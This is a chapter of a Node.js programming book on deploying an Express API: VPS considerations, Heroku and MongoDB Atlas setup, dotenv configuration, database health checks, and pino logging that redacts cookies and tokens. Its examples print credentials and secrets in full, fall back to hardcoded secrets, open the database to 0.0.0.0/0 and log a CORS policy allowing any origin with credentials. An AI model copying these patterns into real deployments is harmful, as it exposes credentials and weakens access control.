Chapter 6
A Complete Server: Deployment
It doesn’t matter how impressive our server is if nobody else can use it. We need to ship our work for it to matter. In this chapter we’ll cover different ways to get our API live and different things we’ll want to keep in mind for production apps.
Running our app on a remote server can sometimes be tricky. Remote servers are often a very different environment than our development laptops. We’ll use some configuration management methods to make it easy for our app to both run locally on our own machine and in the cloud (i.e. someone else’s datacenter).
Once our app is deployed, we’ll need to be able to monitor it and make sure that it’s behaving the way we expect. For this we want things like health checks, logging, and metrics visualization.
For fun we can also test the performance of our API with tooling designed to stress-test our app such as ab (Apache Bench) or siege.
What You Will Learn
Deployment is a huge topic that warrants a book of its own. In this chapter we are going to discuss:
- Using a VPS (Virtual Private Server) and the various deployment considerations there
- Using a PaaS (Platform as a Service), with a step-by-step example of how to deploy our Node app to Heroku, including a MongoDB database.
- Deploying to serverless hosts like AWS Lambda and the considerations there
- Features you often need to support for a production app, such as secrets management, logging, and health checks, along with suggestions for tooling.
- and lastly, security considerations, both within your server and in its interactions with JavaScript web apps.
By the end of this chapter, you’ll have a strong orientation for the various pieces required to deploy a production app. Let’s dive in.
Deployment Options
Today, there’s no shortage of options for us to deploy our API. Ultimately, there’s a tradeoff between how much of the underlying platform we get to control (and therefore have to manage) and how much of that we want handled automatically.
Using a VPS (Virtual Private Server)
On one end of the spectrum we’d set up our own VPS (virtual private server) on a platform like DigitalOcean (or ChunkHost, Amazon EC2, Google GCE, Vultr, etc.). Running our app on a server like this is, in many ways, the closest to running it on our own computer. The only difference is that we’d need to use a tool like SSH to log in and then install everything necessary to get our app ready.
This approach requires us to be familiar with a decent amount of system administration, but in return, we gain a lot of control over the operating system and environment our app runs on.
In theory, it’s simple to get our app running: sign up for a VPS, choose an operating system, install node, upload our app’s code, run npm install and npm start, and we’re done. In practice, there’s a lot more we’d need to consider. This approach enters the realm of system administration and DevOps — entire disciplines on their own.
Here, I'm going to share many of the high-level considerations you need to make if you're deciding to run your app on a VPS. Because there is so much to consider, I'll be giving you some guidelines and links to reference to learn more (rather than a detailed code tutorial on each).
Security & System Administration
Unlike our personal computers, a VPS is publicly accessible. We would be responsible for the security of our instance. There’s a lot that we’d have to consider: security updates, user logins, permissions, and firewall rules to name a few.
We also need to ensure that our app starts up with the system and stays running. systemd is the standard approach to handle this on Linux systems. However, some people like using tools like [pm2](https://pm2.io/doc/en/runtime/overview/) for this.
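For a rough sense of what the systemd option involves, here’s a minimal unit file sketch; the service name, user, and paths are all hypothetical:

# /etc/systemd/system/myapp.service (hypothetical name and paths)
[Unit]
Description=My Node.js API
After=network.target

[Service]
Type=simple
User=myapp
WorkingDirectory=/srv/myapp
ExecStart=/usr/bin/node server.js
Restart=on-failure
Environment=NODE_ENV=production

[Install]
WantedBy=multi-user.target

We could then enable and start the service with sudo systemctl enable --now myapp, and systemd would restart it if it crashes and start it again after a reboot.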
We’d also need to set up MongoDB on our server instance. So far, we’ve been using the MongoDB database that we’ve been running locally.
HTTPS
The next thing we’d have to take care of is HTTPS. Because our app relies on authentication, it needs to use HTTPS when running in production so that the traffic is encrypted. If we do not make sure the traffic is encrypted, our authentication tokens will be sent in plain-text over the public internet. Any user’s authentication token could be copied and used by a bad actor.
To use HTTPS for our server we’d need to make sure that our app can provision certificates and run on ports 80 and 443. Provisioning certificates isn’t as painful as it used to be thanks to Let’s Encrypt and modules like [greenlock-express](https://www.npmjs.com/package/greenlock-express). However, to use ports 80 and 443 our app would need to be run with elevated privileges, which comes with additional security and system administration considerations.
Alternatively, we could choose to handle only unencrypted traffic in our Node.js app and use a reverse proxy (Nginx or HAProxy) for TLS termination.
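As a sketch of the reverse proxy option, an Nginx server block for TLS termination might look like this; the domain, certificate paths, and app port are assumptions:

server {
    listen 443 ssl;
    server_name api.example.com;

    # certificates provisioned by Let's Encrypt (hypothetical paths)
    ssl_certificate     /etc/letsencrypt/live/api.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/api.example.com/privkey.pem;

    location / {
        # forward decrypted traffic to the Node.js app on a local port
        proxy_pass http://127.0.0.1:1337;
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}

With this in place, our Node.js app never touches certificates or privileged ports; it just listens on an unprivileged local port.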
Scaling
There’s another issue with using HTTPS directly in our app. Even if we change our app to run an HTTPS server and run it on privileged ports, by default we could only run a single node process on the instance. Node.js is single-threaded; each process can only utilize a single CPU core. If we wanted to scale our app beyond a single CPU we’d need to change our app to use the [cluster](https://nodejs.org/api/cluster.html) module. This would enable us to have a single process bind to ports 80 and 443 and still have multiple processes to handle incoming requests.
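Here’s a minimal sketch of that pattern, assuming our app’s entry point is server.js:

// cluster.js -- a minimal sketch; assumes server.js starts our app
const cluster = require('cluster')
const os = require('os')

if (cluster.isMaster) {
  // fork one worker per CPU core; workers share the listening socket
  os.cpus().forEach(() => cluster.fork())

  // if a worker dies, replace it so we keep full capacity
  cluster.on('exit', worker => {
    console.log(`worker ${worker.process.pid} died, restarting`)
    cluster.fork()
  })
} else {
  require('./server')
}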
If we rely on a reverse proxy, we don’t have this issue. Only the proxy will listen to ports 80 and 443, and we are free to run as many copies of our Node.js app on other ports as we’d like. This allows us to scale vertically by running a process for each CPU on our VPS. To handle more traffic, we simply increase the number of cores and amount of memory of our VPS.
We could also scale horizontally, by running multiple instances in parallel. We’d either use DNS to distribute traffic between them (e.g. round-robin DNS), or we would use an externally managed load balancer (e.g. DigitalOcean Load Balancer, Google Cloud Load Balancing, AWS Elastic Load Balancing, etc.).
Scaling horizontally has an additional benefit. If we have fewer than two instances running in parallel, we’ll have downtime whenever we need to perform server maintenance that requires system restarts. By having two or more instances, we can route traffic away from any instance while it is undergoing maintenance.
Multiple Apps
If we wanted to run a different app on the same VPS we’d run into an issue with ports. All traffic going to our instance would be handled by the app listening to ports 80 and 443. If we were using Node.js to manage HTTPS, and we created a second app, it wouldn’t be able to also listen to those ports. We would need to change our approach.
To handle situations like this we’d need a reverse proxy to sit in front of our apps. The proxy would listen to ports 80 and 443, handle HTTPS certificates, and would forward traffic (unencrypted) to the corresponding app. As mentioned above, we’d likely use Nginx or HAProxy.
Monitoring
Now that our apps are running in production, we’ll want to be able to monitor them. This means that we’ll need to be able to access log files, and watch resource consumption (CPU, RAM, network IO, etc…).
The simplest way to do this would be to use SSH to log into an instance and use Unix tools like tail and grep to watch log files and htop or iotop to monitor processes.
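For example (the log file path here is hypothetical):

# follow the app's log and show only error lines
tail -f /var/log/myapp/app.log | grep -i error

# interactive view of per-process CPU and memory usage
htop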
If we were interested in better searching or analysis of our log files, we could set up Elasticsearch to store our log events, Kibana for search and visualization, and Filebeat to ship the logs from our VPS instances to Elasticsearch.
Deploying Updates
After our app is deployed and running in production, that’s not the end of the story. We’ll want to be able to add features and fix issues.
After we push a new feature or fix, we could simply SSH into the instance, do a quick git pull && npm install, and then restart our app. This gets more complicated as we increase the number of instances, processes, and apps that we’re running.
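On a single instance, that flow might look something like this; the host, directory, and service name are placeholders:

ssh deploy@my-vps <<'EOF'
cd /srv/myapp
git pull
npm install --production
sudo systemctl restart myapp
EOF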
In the event of a faulty update where a code change breaks our app, it’s helpful to quickly roll back to a previous version. If our app’s code is tracked in git, this can be handled by pushing a “revert” commit and treating it like a new update.
Within the Node.js ecosystem, tools like PM2 and shipit allow us to automate a lot of this and can handle rollbacks. Outside of the Node.js ecosystem, there are more general-purpose DevOps tools like Ansible that, if used properly, can do all of this and more.
Zero-Downtime Deploys
When deploying updates it’s important to think about downtime. To perform zero-downtime deploys, we need to make sure that (1) we always have a process running, and (2) traffic is not routed to a process that can’t handle requests.
If we were to run only a single process, we couldn’t have a zero-downtime deploy. After the update is transferred to our instance, we would need to restart our Node.js app. While it is restarting, it will not be able to accept requests. If we aren’t receiving much traffic, this may not be a big deal. If it’s not likely that a request will come in during the short window our app is restarting, we may not care.
On the other hand, if we do have a very popular app, and we don’t want our users to get timeouts, we’ll need to make sure that we always have a process available to receive traffic. This means that we need to run more than one process, restart processes one at a time, and never serve traffic to a process that is restarting. This is a tricky bit of orchestration, but it can be achieved using the tools above.
VPS Summary
There can be a lot to consider when deploying a Node.js app to a VPS. If we have a low-traffic app that doesn’t need 100% uptime, it can be a straightforward way to get it up and in front of users. Unfortunately, for anyone uninterested in system administration or DevOps, this approach is likely to be too much work when it’s necessary to monitor, scale, or use continuous delivery.
On the bright side, many companies are good at providing the services we’d be looking for when hosting a production app. They’ve rolled all these features up into their own deployment platforms, and these can be a great choice if we’re not interested in building them out ourselves.
If you're looking for something in between a VPS and a PaaS, Dokku or CapRover will allow you to run your own simplified PaaS on a VPS (or other hardware).
Using a PaaS (Platform as a Service)
Compared to a VPS, running our app on a PaaS like Heroku or App Engine is more restricting. The operating system is no longer under our control and there are constraints on what our app can do. These constraints vary, but there are some common ones, like not being able to write to the file system or to perform long-running tasks.
On the other hand, these platforms are designed to be very easy to deploy to, and to take care of a lot of the pain points we’d have when managing deployments on a VPS. Dealing with a few constraints is often a small price to pay for the added benefits. For our purposes, using a PaaS will be the lowest-hassle way to get an app running in production.
Compared to a VPS:
- We don’t need to worry about system administration or security.
- Scaling is handled automatically when necessary.
- It’s easy to run as many different apps as we’d like.
- Monitoring is built in.
- Zero-downtime deploys are easy.
As an example, we're going to deploy our app to Heroku. Before we can do that, we first need to sign up for an account, download the Heroku Command Line Interface (CLI), and log in.
Configure the Database
Next we’ll prepare our app so that it can run on Heroku’s platform. We don’t control the operating system, so we can’t install a database alongside our app. Instead we’ll use a MongoDB database that’s hosted separately from our app.
Luckily, we can quickly set one up for free using MongoDB Atlas. Heroku is hosted on AWS in the us-east-1 (N. Virginia) region, so we’ll choose that option for the lowest latency:
MongoDB Atlas Configuration
Next, we have to create a database user. This will be the user that our app connects to the database as. We’ll use the username fs-node and choose a password. This user needs read and write permissions:
Create a MongoDB User
openssl has a convenient command-line tool to generate random bytes for use in passwords. For example, if we want 20 random bytes hex encoded, we'd run: openssl rand -hex 20. This would give us output like: 27c2200680f306b2378899c119385a2398127dd3.
Before we can connect to the database with this username and password, we need to configure the database to allow connections. By default, MongoDB Atlas will not accept any connections. We need to provide the IP addresses that are acceptable. For now, we’ll use 0.0.0.0/0 to make our database accessible from anywhere.
MongoDB Atlas IP Configuration
Make our database accessible from anywhere.
To increase the security of our database, we should restrict access to a limited number of IP addresses. This is difficult on Heroku. By default, our app's IP will constantly change. It's possible to limit access to the range of IPs that Heroku will use, but this is a very large range (entire AWS regions). To limit our app to a small number of IP addresses we would need to use a Network Add-On or Private Spaces. Once we do that, we'd be able to restrict database access to the limited number of IP addresses our app will connect from. For more information see this Heroku support issue.
Now that our database has a user account and is accessible, we can make sure that our app can connect to it. For this we’ll need to get the connection string that our app will use:
MongoDB Atlas Connection String
The MongoDB connection string is in the format:
mongodb+srv://${username}:${password}@${host}/${dbName}?${connectionOptions}
Atlas will provide the connection string with all values filled in except for the password that we just created. If there are special characters in the password, make sure that they are URL encoded.
After we insert the password, we can use this connection string when running locally to make sure everything is working:
MONGO_URI=mongodb+srv://fs-node:27c2200680f306b2378899c119385a2398127dd3@cluster0-qjtmq.mongodb.net/test?retryWrites=true \
npm start
This works because in our db.js file we allow the connection string to be overridden by the MONGO_URI environment variable:
mongoose.connect(
  process.env.MONGO_URI || 'mongodb://localhost:27017/printshop',
  { useNewUrlParser: true, useCreateIndex: true }
)
Assuming everything has been set up correctly, our app will start up without issue and we’ll be able to request the (empty) product list without seeing an error.
If our connection string is formatted incorrectly or we haven't properly set network access, we might see an authentication error like MongoError: bad auth Authentication failed or Error: querySrv ENOTFOUND _mongodb._tcp. If so, it's much easier to catch and fix that now than to debug these issues on the remote Heroku server.
With our database configured and ready, it’s now time to deploy our app!
Deploying
The first thing we need to do to deploy our app on Heroku is to use the Heroku CLI to create a new app on their platform. To do this we use the heroku create command. We’ll call our project fullstack-node-book:
$ heroku create fullstack-node-book
Creating ⬢ fullstack-node-book... done
https://fullstack-node-book.herokuapp.com/ | https://git.heroku.com/fullstack-node-book.git
In addition to creating a new app on their platform, this also added a new remote to our git config. We can see that if we cat .git/config:
$ cat .git/config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        ignorecase = true
        precomposeunicode = true
[remote "heroku"]
        url = https://git.heroku.com/fullstack-node-book.git
        fetch = +refs/heads/*:refs/remotes/heroku/*
Heroku uses git for deployment. This means that any app we want to deploy must be able to be pushed to a git repository. If you don't have git configured yet, consult the official First-Time Git Setup guide, and make sure that your project is tracked with git.
The next step is to make sure that when our app is running on Heroku’s platform it has the correct environment variables for our database and secrets. For the database, we want to use the MongoDB Atlas connection string that we just tested. However, we want to generate new, secure secrets for the admin password and JWT secret. We can do this in one shot using the heroku config command:
$ heroku config:set \
  MONGO_URI=mongodb+srv://fs-node:27c2200680f306b2378899c119385a2398127dd3@cluster0-qjtmq.mongodb.net/test?retryWrites=true \
  JWT_SECRET=$(openssl rand -base64 32) \
  ADMIN_PASSWORD=$(openssl rand -base64 32)
Setting MONGO_URI, JWT_SECRET, ADMIN_PASSWORD and restarting ⬢ fullstack-node-book... done, v1
ADMIN_PASSWORD: VlVxoYlIavixTUyVWPcjv/cD6Ho+eTZ+Tt4KTYFqvIM=
JWT_SECRET:     +UfpfaFFAssCO9vbc81ywrPwDbKy3/DEe3UQLmliskc=
MONGO_URI:      mongodb+srv://fs-node:27c2200680f306b2378899c119385a2398127dd3@cluster0-qjtmq.mongodb.net/test?retryWrites=true
We use openssl rand -base64 32 to generate random strings for use as our production admin password and JWT secret. We need to use at least 32 bytes for our JWT secret to protect against brute forcing. The Heroku CLI will output the values once they’re set, and if we ever need them again we can use the heroku config command to have them listed. We’ll need the ADMIN_PASSWORD to log in as the admin user.
With the environment variables in place, our app can now start up with all the information it needs. The only thing left is to send our app’s code over to Heroku. We can do this with a simple push:
$ git push heroku master
Counting objects: 24, done.
Delta compression using up to 8 threads.
Compressing objects: 100% (22/22), done.
Writing objects: 100% (24/24), 74.60 KiB | 8.29 MiB/s, done.
Total 24 (delta 1), reused 0 (delta 0)
remote: Compressing source files... done.
remote: Building source:
remote:
remote: -----> Node.js app detected
remote:
remote: -----> Creating runtime environment
remote:
remote:        NPM_CONFIG_LOGLEVEL=error
remote:        NODE_ENV=production
remote:        NODE_MODULES_CACHE=true
remote:        NODE_VERBOSE=false
remote:
remote: -----> Installing binaries
remote:        engines.node (package.json):  unspecified
remote:        engines.npm (package.json):   unspecified (use default)
remote:
remote:        Resolving node version 10.x...
remote:        Downloading and installing node 10.16.0...
remote:        Using default npm version: 6.9.0
remote:
remote: -----> Installing dependencies
remote:        Installing node modules (package.json)
remote:
remote:        > deasync@0.1.15 install /tmp/build_7a8dbae3929e0d5986b4f38e08d66f19/node_modules/deasync
remote:        > node ./build.js
remote:
remote:        linux-x64-node-10 exists; testing
remote:        Binary is fine; exiting
remote:
remote:        > bcrypt@3.0.6 install /tmp/build_7a8dbae3929e0d5986b4f38e08d66f19/node_modules/bcrypt
remote:        > node-pre-gyp install --fallback-to-build
remote:
remote:        [bcrypt] Success: "/tmp/build_7a8dbae3929e0d5986b4f38e08d66f19/node_modules/bcrypt/lib/binding/bcrypt_lib.node" is installed via remote
remote:
remote:        > mongodb-memory-server@5.4.5 postinstall /tmp/build_7a8dbae3929e0d5986b4f38e08d66f19/node_modules/mongodb-memory-server
remote:        > node ./postinstall.js
remote:
remote:        mongodb-memory-server: checking MongoDB binaries cache...
remote:        mongodb-memory-server: binary path is /tmp/build_7a8dbae3929e0d5986b4f38e08d66f19/node_modules/.cache/mongodb-memory-server/mongodb-binaries/4.0.3/mongod
remote:        added 460 packages from 327 contributors and audited 1652 packages in 19.956s
remote:        found 0 vulnerabilities
remote:
remote:
remote: -----> Build
remote:
remote: -----> Caching build
remote:        - node_modules
remote:
remote: -----> Pruning devDependencies
remote:        removed 248 packages and audited 396 packages in 3.982s
remote:        found 0 vulnerabilities
remote:
remote:
remote: -----> Build succeeded!
remote: -----> Discovering process types
remote:        Procfile declares types     -> (none)
remote:        Default types for buildpack -> web
remote:
remote: -----> Compressing...
remote:        Done: 44.3M
remote: -----> Launching...
remote:        Released v2
remote:        https://fullstack-node-book.herokuapp.com/ deployed to Heroku
remote:
remote: Verifying deploy... done.
To https://git.heroku.com/fullstack-node-book.git
 * [new branch]      master -> master
Our app is now running at https://fullstack-node-book.herokuapp.com/ and we can verify that it’s working as expected with curl:
curl https://fullstack-node-book.herokuapp.com/products
Of course we haven’t added any products to the production database yet so we expect the results to be empty. However, we can also log in using our new admin password:
curl -sX POST \
  -H 'content-type: application/json' \
  -d '{"username": "admin", "password": "QoMsSRVIaTlR3StXSHg9m/UMhaZmTS4+IJeen4lFKK0="}' \
  https://fullstack-node-book.herokuapp.com/login \
  | jq -r .token \
  > admin.jwt
And create a product:
curl -X POST \
  -H 'content-type: application/json' \
  -H "authorization: Bearer $(cat admin.jwt)" \
  -d "$(cat products.json | jq '.[1]')" \
  https://fullstack-node-book.herokuapp.com/products
And now we’ll be able to see it in the list:
curl -s https://fullstack-node-book.herokuapp.com/products | jq
[
  {
    "_id": "cjv32mizi0000c9gl8lxa75sd",
    "tags": [
      "marble",
      "texture",
      "red",
      "black",
      "blood",
      "closeup",
      "detail",
      "macro"
    ],
    ...
  }
]
Deploying to Serverless Hosts
Since the release of AWS Lambda in April 2015, serverless deployments have steadily risen in popularity. Today there are many choices if we want to go this route, including Google Cloud Functions, Zeit Now, Netlify Functions, Cloudflare Workers, and Azure Functions, to name a few.
When using serverless deploys we cede even more management responsibility to the platform than when using a PaaS. With a PaaS we’re responsible for creating a fully functioning app. With serverless, we can skip much of the app scaffolding and just create individual endpoints; the platform handles routing.
Similar to when moving from a VPS to a PaaS, there are additional rules that our app has to follow when moving to serverless. The most notable is that we’re no longer creating a stand-alone app that can run on any system. Instead, we create a collection of functions that are capable of running within the platform’s service. For this reason it can be easier to build directly for serverless deploys than to rearchitect an existing app to fit a particular platform.
While we won’t cover that here, it’s worth noting that serverless deploys provide interesting tradeoffs and can be a great choice for particular use-cases.
Deployment Considerations
Our app is capable of running in production now, but there are a number of changes that will make our life easier.
Configuration Management
First, we have multiple files that access process.env directly. This means that we don’t have a central place to see all of the environment variables that control the configuration of our app. It’s much better to create a single config.js module that other files can require.
Additionally, when running locally, it’s inconvenient to set environment variables each time we want to run our app with different environment settings. A much better approach is to use dotenv.
dotenv allows us to set environment variables from a .env file instead of setting them on the command line. For example, if we create a file called .env in the root of our project with the following contents:
ADMIN_PASSWORD=leeXq9AbF/snt0LSRzeEdVsx/D/2l4RbiS3ZZG8lVls=
JWT_SECRET=pqE9mdrIBpQAwUqcrY2ApwOdSA0RaJhcFq8nO0tPNHI=
MONGO_URI=mongodb+srv://fs-node:27c2200680f306b2378899c119385a2398127dd3@cluster0-qjtmq.mongodb.net/test?retryWrites=true
when we run our app, all of those variables will be set for us.
Using this in conjunction with a config.js file, we’d get something like this:
require('dotenv').config()

module.exports = {
  adminPassword: process.env.ADMIN_PASSWORD || 'iamthewalrus',
  jwtSecret: process.env.JWT_SECRET || 'mark it zero',
  mongo: {
    connectionString: process.env.MONGO_URI || 'mongodb://localhost:27017/printshop'
  }
}
Just like before, we can still have defaults for development. If the environment variables aren’t set because we don’t have a .env file, our app will use the local development values.
It’s important to remember that .env files should never be checked into version control. They are simply a convenience to avoid setting variables in our terminal. However, it is useful to check a .env.example file into git. This file has all of the variables with their values removed and acts as a catalog of configuration options. This makes it easy to see which variables are available, and team members can use it as a starting place for their own .env files. Here’s our .env.example file:
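Based on the configuration above, the file contains just the variable names with empty values:

ADMIN_PASSWORD=
JWT_SECRET=
MONGO_URI=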
Health Checks
The sad truth of running apps in production is that if something can go wrong, it will. It’s important to have a way to quickly check if our app is up and be notified if our app goes down.
The most basic health check would be a publicly accessible endpoint that returns a 200 HTTP status code if everything is ok. If that endpoint responds with an error, we’ll know our app needs attention.
It’s easy enough to create a new /health route that immediately returns a 200 HTTP status, and that will get us most of the way there. If our app is up and running, we’ll get the appropriate response when we hit that endpoint.
Here’s an example of a route handler function that can serve as a basic health check route:
function health (req, res) {
  res.json({ status: 'OK' })
}
However, we should also think a bit more about what “up and running” means. Depending on how our app is built, it’s possible that our basic health check will return OK responses while user requests are dropped. For example, this can happen if we lose the connection to our database or another backing service. For our health check to be comprehensive, we need to test the connections to any backing services that we rely on.
We can change our basic health check handler to only successfully respond after testing our database. It might be tempting to only test reads, but to be absolutely sure that our database is working correctly, we should test both reads and writes. This way we’ll be alerted if our database runs out of storage or develops other write-related issues.
First we add a new checkHealth( ) method to our db . js module:
module.exports.checkHealth = async function () {
  const time = Date.now()
  const { db } = mongoose.connection
  const collection = db.collection('healthcheck')
  const query = { _id: 'heartbeat' }
  const value = { time }
  await collection.update(query, value, { upsert: true })
  const found = await collection.findOne({ time: { $gte: time } })
  if (!found) throw new Error('DB Healthcheck Failed')
  return !!found
}
This method will either resolve as true if the database is able to read and write, or it will throw an error if it can’t. Adding it to our route handler is simple:
async function checkHealth (req, res, next) {
  await db.checkHealth()
  res.json({ status: 'OK' })
}
If db.checkHealth() throws an error, our error handling middleware will deal with it; otherwise, we respond with an OK status. We can test the behavior by stopping MongoDB after our app is running and hitting the /health route.
Once we have this new endpoint deployed we can use a service to regularly check our uptime and alert us (via SMS, email, Slack, etc.) if there’s a problem. There are many services that do this (StatusCake, Pingdom, Uptime, Oh Dear!, and more), each with their own level of service and pricing.
Logging
Our logs can tell us how our app is being used, by whom, and how well it is serving our users. Not only that, but we can use our logs as the foundation for charts and visualizations. This opens the door to seeing how our app is performing over longer time periods. This is critical to anticipating problems before they happen.
Currently, our app only logs errors. While this is a good start, when running an app in production it’s critical to have more visibility than this. At a minimum, we should be logging each request along with the url requested, user agent, and response time.
However, even if we add additional information to our logs, they will only be useful if they are easily accessible and searchable. We can achieve this in many different ways. We can use services like Stackdriver Logging, Papertrail, Datadog, Graylog, and Loggly, or we can run our own stack with tools like Elasticsearch and Kibana.
If our app is deployed to Heroku, we'll be able to use the heroku logs command to fetch our logs. We can even use heroku logs --tail to view logs in real time as they happen. While this gives us the ability to debug problems in the moment, we're limited to the previous 1,500 lines. It's best to use a logging add-on for more power.
Currently, our app is logging with plaintext. This is fine for humans working locally, but once we’re running in production, we’ll want our logs to have more than just a single message. We’ll want separate, machine-readable metadata fields like timestamp, hostname, and request identifiers. When recording metrics like response time, we also need to be able to log numbers instead of text. To accomplish this, instead of writing logs as plaintext, we’ll use JSON.
One of the best things we can do is make sure that all log messages related to a request can be linked together. This is indispensable when we need to figure out how a particular error happened. By adding a request ID to each log message, we can search for all messages with a particular ID to get a better picture of the chain of events that led to an issue.
To upgrade our app’s logging we’ll use pino. pino is a performance-focused JSON logger. It has been designed to use minimal resources and is 5x faster than alternatives. Conveniently, we can use the express-pino-logger module to plug it into our app as middleware:
const express = require('express')
const bodyParser = require('body-parser')
const pinoLogger = require('express-pino-logger')
const cookieParser = require('cookie-parser')

const api = require('./api')
const auth = require('./auth')
const middleware = require('./middleware')

const port = process.env.PORT || 1337

const app = express()

app.use(pinoLogger())
app.use(middleware.cors)
app.use(bodyParser.json())
app.use(cookieParser())

app.get('/health', api.checkHealth)
Now when we run our app, each request will automatically be logged. To try it out, we’ll use curl to log in while our app is running and look at the output:
$ node server.js
Server listening on port 1337
{"level":30,"time":1562767769370,"pid":41654,"hostname":"Fullstack-Nodejs.lan","req":{"id":1,"method":"POST","url":"/login","headers":{"host":"localhost:1337","user-agent":"curl/7.51.0","accept":"*/*","content-type":"application/json","content-length":"49"},"remoteAddress":"::1","remotePort":52307},"res":{"statusCode":200,"headers":{"x-powered-by":"Express","access-control-allow-origin":"*","access-control-allow-methods":"POST, GET, PUT, DELETE, OPTIONS, XMODIFY","access-control-allow-credentials":"true","access-control-max-age":"86400","access-control-allow-headers":"X-Requested-With, X-HTTP-Method-Override, Content-Type, Accept","set-cookie":"jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTYyNzY3NzY5LCJleHAiOjE1NjUzNTk3Njl9.Yg3vnCYeZCGofrTswiXAMyrNsAEHxhQ5jgnwHV0b0tw; Path=/; HttpOnly","content-type":"application/json; charset=utf-8","content-length":"180","etag":"W/\"b4-AdZOUjfvwqgDehB+Slq44lRDCkk\""}},"responseTime":27,"msg":"request completed","v":1}
That’s a lot of information. This is great for production, but it’s not very readable when running locally. pino-pretty is a module we can use to make our server output easier to read. After we install it globally using npm i -g pino-pretty, we can run node server.js and pipe the output to pino-pretty. Now the output will be nicely formatted.
Using curl to log in again, we can see the difference:
Now, we can clearly see all the information that pino is logging. In fact, we can see that pino logs all the request and response headers, which is super useful.
Unfortunately, the headers contain the authentication cookie we send to the client! The JWT token is right there in set -cookie in the response headers. Anyone with access to the logs would be able to impersonate the admin user. Depending on who has access to these logs, this could be a big security problem.
If our logs are only viewable by people who already have admin access, this isn’t a big deal. However, it can be very useful to share logs with other developers or even people outside our organization for debugging purposes. If we leave sensitive information like credentials in our logs, this will cause headaches or worse. It’s best to remove them entirely.
Luckily, removing sensitive information from our logs is easy with the pino-noir module. After we install it, we can use it in conjunction with express-pino-logger.
Our logging configuration is getting more complicated than a single line, so we’re going to move our logging setup from server.js to middleware.js. Here’s how we can use pino-noir with express-pino-logger:
const pinoNoir = require('pino-noir')
const pinoLogger = require('express-pino-logger')
const { STATUS_CODES } = require('http')

module.exports = {
  logger: logger(),
  cors,
  notFound,
  handleError,
  handleValidationError
}

function logger () {
  return pinoLogger({
    serializers: pinoNoir([
      'res.headers.set-cookie',
      'req.headers.cookie',
      'req.headers.authorization'
    ])
  })
}
In server.js we can now change our app.use() call to use our updated logger:
app.use(middleware.logger)
When we require middleware.js, middleware.logger will be a customized pino logger that masks the res.headers.set-cookie, req.headers.cookie, and req.headers.authorization properties. In the future, if we want to hide other information from our logs, we can simply add the paths here.
To verify that this worked, let’s run our server, log in again, and look at the output. If we look below, we can see that set-cookie now shows as [Redacted], exactly what we want:
$ node server.js | pino-pretty
Server listening on port 1337
[1562857312951] INFO (68228 on Fullstack-Nodejs.local): request completed
  req: {
    "id": 1,
    "method": "POST",
    "url": "/login",
    "headers": {
      "host": "localhost:1337",
      "user-agent": "curl/7.51.0",
      "accept": "*/*",
      "content-type": "application/json",
      "content-length": "49"
    },
    "remoteAddress": "::1",
    "remotePort": 55840
  }
  res: {
    "statusCode": 200,
    "headers": {
      "x-powered-by": "Express",
      "access-control-allow-origin": "*",
      "access-control-allow-methods": "POST, GET, PUT, DELETE, OPTIONS, XMODIFY",
      "access-control-allow-credentials": "true",
      "access-control-max-age": "86400",
      "access-control-allow-headers": "X-Requested-With, X-HTTP-Method-Override, Content-Type, Accept",
      "set-cookie": "[Redacted]",
      "content-type": "application/json; charset=utf-8",
      "content-length": "180",
      "etag": "W/\"b4-ZAZITgMoMZ0Y19qZVtw/m4GXBmA\""
    }
  }
  responseTime: 25
We can also send an authenticated request using a JWT to verify that we don’t log tokens in the request headers.
Great, our automatic route logging is good to go. We can now use pino to log any other information that we’re interested in, and as a bonus, we can use the req.id property to tie it to the route logs.
Currently, when a new user is created we don’t log much information. Because the new email address and username are sent via the POST body, they aren’t automatically logged. However, it might be nice to log new email addresses and usernames. We can do this easily:
async function createUser (req, res, next) {
  const user = await Users.create(req.body)
  const { username, email } = user
  req.log.info({ username, email }, 'user created')
  res.json({ username, email })
}
By adding a call to req.log.info() we use pino to output another log line that is correctly formatted and associated with that particular request. Let’s see what it looks like when we hit this endpoint with that logging in place:
Server listening on port 1337
[1562858941319] INFO (78868 on Fullstack-Nodejs.local): user created
  req: {
    "id": 1,
    "method": "POST",
    "url": "/users",
    "headers": {
      "content-type": "application/json",
      "user-agent": "PostmanRuntime/7.13.0",
      "accept": "*/*",
      "cache-control": "no-cache",
      "postman-token": "9116ffde-bfa2-42e6-8c44-4f6a2922c0c0",
      "host": "localhost:1337",
      "cookie": "[Redacted]",
      "accept-encoding": "gzip, deflate",
      "content-length": "101",
      "connection": "keep-alive"
    },
    "remoteAddress": "::1",
    "remotePort": 57250
  }
  username: "fullstackdavid"
  email: "david@fullstack.io"
[1562858941325] INFO (78868 on Fullstack-Nodejs.local): request completed
  req: {
    "id": 1,
    "method": "POST",
    "url": "/users",
    "headers": {
      "content-type": "application/json",
      "user-agent": "PostmanRuntime/7.13.0",
      "accept": "*/*",
      "cache-control": "no-cache",
      "postman-token": "9116ffde-bfa2-42e6-8c44-4f6a2922c0c0",
      "host": "localhost:1337",
      "cookie": "[Redacted]",
      "accept-encoding": "gzip, deflate",
      "content-length": "101",
      "connection": "keep-alive"
    },
    "remoteAddress": "::1",
    "remotePort": 57250
  }
  res: {
    "statusCode": 200,
    "headers": {
      "x-powered-by": "Express",
      "access-control-allow-origin": "*",
      "access-control-allow-methods": "POST, GET, PUT, DELETE, OPTIONS, XMODIFY",
      "access-control-allow-credentials": "true",
      "access-control-max-age": "86400",
      "access-control-allow-headers": "X-Requested-With, X-HTTP-Method-Override, Content-Type, Accept",
      "content-type": "application/json; charset=utf-8",
      "content-length": "59",
      "etag": "W/\"3b-p0L94hLX+OF/cZtJfv9brXScrtY\""
    }
  }
  responseTime: 172
For this request, we get two lines of log output. The first is for our added log, where we can see that the new user’s username is fullstackdavid, and the second is the default pino output for all requests. What’s great about this is that we can use req.id to link them. This is very useful for seeing all information related to a particular event. While this is only a small example, we now know that when the fullstackdavid account was created, it took 172 milliseconds.
In this example we’re running locally, so the only two log lines in the output are related to the same request. However, in production we’ll be getting many requests at the same time, so we wouldn’t be able to assume that two adjacent log lines are from the same request. We need req.id to link them together.
Compression
